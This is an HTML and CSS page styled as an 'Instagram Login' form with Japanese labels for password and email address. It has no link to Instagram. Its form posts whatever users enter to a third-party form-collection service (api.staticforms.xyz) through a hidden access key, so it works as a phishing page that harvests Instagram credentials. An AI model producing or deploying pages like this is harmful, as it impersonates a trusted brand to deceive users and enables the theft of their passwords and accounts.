<!DOCTYPE html>
<html lang="en">
    <div class="container">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <link rel="stylesheet" href="style.css" />
  </head>
  <title>Instagram</title>
  <body>
    <h1>Instagram  Login</h1>
<div class="contact-form">
    <p class="title"></p>

    <form action="https://api.staticforms.xyz/submit" method="post">
      <input type="hidden" name="accessKey" value="932b0dac-39b1-44c7-bfd9-1f9e07509d48">
      <input type="hidden" name="subject" value="Test">
      <div class="item">
        <label class="label">パスワード</label>
        <input type="text" class="inputs" name="name" />
      </div>

      <div class="item">
        <label class="label">メールアドレス</label>
        <input type="email" class="inputs" name="email" required />
      </div>

      
      </div>

       

        <div class="button-area">
          <input   type="submit" value="ログイン" />
          <input type="reset" value="リセット" />
        </div>
      </div>
    </form>
</div>
<style>
@import url("https://fonts.googleapis.com/css2?family=M+PLUS+Rounded+1c:wght@300;400;500;700&display=swap");
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "M PLUS Rounded 1c", sans-serif;
}

body {
  height: 100vh;
  display: grid;
  place-content: center;
}

.contact-form {
  border: 1px solid #aaa;
  padding: 5% 5%;
}

.title {
  text-align: center;
  font-size: 10%;
  margin-bottom: 5;
  font-weight: bold;
}

form {
  width: 250px;
  margin: 0 auto;
}

.item {
  overflow: hidden;
  margin-bottom: 20px;
}

.label {
  float: left;
  margin-right: 20px;
  width: 135px;
  border-left: solid 3px #c2704f;
  padding-left: 10px;
}

.inputs {
  float: left;
  width: 300px;
}

input[type="text"],
input[type="email"] {
  border: solid 1px #aaa;
  padding: 10px;
  font-size: 15px;
  border-radius: 5px;
}

textarea {
  border: solid 1px #aaa;
  border-radius: 5px;
  padding: 10px;
  height: 160px;
  width: 300px;
  font-size: 15px;
}

.button-area {
  text-align: center;
}

input[type="submit"] {
  background: #c2704f;
  border: none;
  color: white;
  font-size: 17px;
  font-weight: bold;
  padding: 10px 20px;
  margin: 0 5px;
  border-radius: 5px;
  box-shadow: 1px 1px 3px black;
  cursor: pointer;
}

input[type="reset"] {
  background: #837a7a;
  border: none;
  color: white;
  font-size: 17px;
  font-weight: bold;
  padding: 10px 20px;
  margin: 0 5px;
  border-radius: 5px;
  box-shadow: 1px 1px 3px black;

  cursor: pointer;
}



</style>
 <!-- Compiled and minified CSS -->
 <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">
  </body>
</div>
</html>
